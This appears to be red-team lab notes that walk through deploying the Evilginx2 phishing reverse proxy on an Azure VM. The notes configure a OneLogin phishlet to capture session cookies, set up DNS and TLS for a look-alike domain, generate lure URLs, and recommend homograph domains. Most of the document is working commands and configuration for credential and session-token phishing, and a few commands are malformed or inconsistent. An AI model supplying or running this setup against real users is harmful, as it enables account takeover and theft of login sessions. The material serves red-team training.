EVILGINX (AWS EC2/AZURE)
this is a relay framework that acts as a web proxy and can be used by red teams to phish credentials. this tool sits in the middle of the traffic and has a back-end connection to the legitimate website which it uses to forward data from the victim. this nginx vps subdomain MUST exactly match the legitimate subdomain to be spoofed.
VPS INSTANCE INSTALLATION
#create the ec2/azure instance
root@oco:~$ BROWSER > https://portal.azure.com > Virtual Machines
Project Details
Subscription: {subscription}
Resource Group: {resourceGroup}
Instance Details
Virtual Machine Name: {evilginx}
Region: US
Availability Options: No Infrastructure Redundancy Required
Security Type: Standard
Image: Ubuntu Server 20.04 LTS - x64 Gen2
VM Architecture: x64
Run w/ Azure Spot Discount: Disabled
Size: Standard D2as_v4 - 2 vcpus 8GiB memory ($$$)
Administrator Account
Authentication Type: SSH public Key
Username: {evilginxUser}
SSH Public Key Source: Generate new key pair
Key pair name: {arbitraryValue}
Inbound Port Rules
Public Inbound ports: None //this disabled public access to instance
Select Inbound Ports: N/A
Disks
Encryption at host: Disabled
OS Disk
OS Disk Type: Premium SSD (locally-redundant storage - LRS)
Delete w/ VM: Enabled
Key Management: Platform-managed key
Enable Ultra Fisk Compatibility: Disabled
Data Disks for {evilginx}: Create and attach a new disk
Name: {evilginx}_DataDisk_0
Source Type: None (Empty Disk)
Size: 16 GiB
Key management: Platform-managed key
Enable shared disk: No
Delete disk w/ VM: Enabled
Management
Network Interface
Virtual Network: {...LabVNet}
Subnet: default (.../24)
Public IP: {...}
NIC Network Security Group: Basic
Public Inbound Ports: None
Select Inbound Ports: N/A
Delete NIC when VM is deleted: Disabled
Enable Accelerated Networking: Enabled
Load Balancing
Place VM Behind Existing LB Solution: Disabled
* Create the VM after reviewGOLANG & EVILGINX INSTALLATION
#create a DNS A record pointing it to the vps instance ip to {subdomain}.{domain}.{tld}
#this is required prior to proceeding
#connect to the ec2 virtual machine
root@evilginx:~$ sudo -i {key}.pem [email protected]
#install golang
root@evilginx:~$ go version
root@evilginx:~$ sudo apt update
root@evilginx:~$ sudo apt update && sudo apt upgrade -y
root@evilginx:~$ wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz
* ALT: sudo apt install golang -y
root@evilginx:~$ sudo tar -xvf go1.11-linux-amd64.tar.gz
root@evilginx:~$ sudo mv go /usr/local
root@evilginx:~$ sudo cp /usr/local/go/bin/go /usr/bin
root@evilginx:~$ nano .profile
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go:$GOPATH/bin
root@evilginx:~$ source .profile //reflect changes
#install evilginx
root@evilginx:~$ go get -u github.com/kgretzky/evilginx2
root@evilginx:~$ ls
go
root@evilginx:~$ cd go
root@evilginx:~$ ls
bin src
root@evilginx:~$ ls go/bin
evilginx2
root@evilginx:~$ ls src/github.com/kgretzky/evilginx2/
...phishlets templates database
root@evilginx:~$ cd src/github.com/kgretzky/evilginx2/
root@evilginx:~$ ls phishlets
...onelogin.yaml amazon.yamlPHISHLET CONFIGURATION
root@evilginx:~$ cd src/github.com/kgretzky/evilginx2/phishlets
#disable unnecessary statements
root@evilginx:~$ nano onelogin.yaml
proxy_hosts:
#-{phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false}
#-{phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com' session: false, is_landing: false}
* comment statements that are not required in CUOPS
#modify configuration for operations
root@evilginx:~$ nano onelogin.yaml
proxy_hosts:
- {phish_sub: 'cwlab', orig_sub: 'cwlab', domain: 'onelogin.com', session: true, is_landing: true}
auth_tokens:
- domain: '.onelogin.com'
keys: ['onelogin.com_user']
- domain: 'cwlab.onelogin.com'
keys: ['sub_session_onelogin.com']
login:
domain: 'cwlab.onelogin.com'
path: '/login'
#phishlets format; note that the phish subdomain MUST match the legitimate subdomain!
* legitimate subdomain: {cwlab}.onelogin.com
* phishing subdomain: {cwlab}.cyberwarfare.live
#perform a test to see the flow of how a potential target will login to the legitimate site
root@oco: BROWSER > {cwlab}.onelogin.com
redirect: https://cwlab.onelogin.com/login2/?retrn=eyJ0...
* this is done IOT see the parameters needed to fully configure evilginx to the operation#reconfigure the evilginx server hostname to match the target webserver as close as possible - use homographs
root@evilginx:~$ hostname
evilginx
root@evilginx:~$ sudo nano /etc/hostname
cyberwarfare.live
root@evilginx:~$ hostnamectl status
Static Hostname: cyberwarfare.live
root@evilginx:~$ sudo reboot
root@cyberwarfare:~$ hostname
cyberwarfare.live
root@cyberwarfare:~$ cd $GOPATH/bin
root@cyberwarfare:~$ ls
evilginx2
#start evilginx2
root@cyberwarfare:~$ sudo ./evilginx2 -p /home/azureuser/go/src/github.com/kgretzky/evilginx2/phishlets/
* the -p specifies the phishlets directory
#configure the domain
evilginx: config domain cyberwarfare.live
evilginx: config ip {evilginx IP from cloud instance}
* {4.193.141.23}
#create a DNS A record pointing {cyberwarfare.live} to the vps instance ip
#use own squarespace domain account
root@oco:~$ BROWSER > https://squarespace.com
Name: cwlab.cyberwarfare.live
IP: {4.193.141.23}
Type: A Record
root@oco:~$ nslookup cwlab.cyberwarfare.live
* must resolve to {4.193.141.23}
evilginx: phishlets hostname onelogin {cyberwarfare.live}
evilginx: phishlets enable onelogin
* this cmd will automatically register & setup the TLS/SSL certificate for the domain cyberwarfare.live
evilginx: lures create onelogin
evilginx: lures edit 0 redirect_url https://cyberwarfare.live
evilginx: get-url 0
https://cwlab.cyberwarfare.live/hmHyBQkP
* this will be the look-alike phishing URL for cwlab.onelogin.com
- the evilginx domain {cyberwarfare.live} must MATCH the legitimate site as close as possible
- e.g., using homoraphs etc
- legit site: onelogin.com
- homograph: 0nelogin.com
* sessions
- this cmd wasn't shownLast updated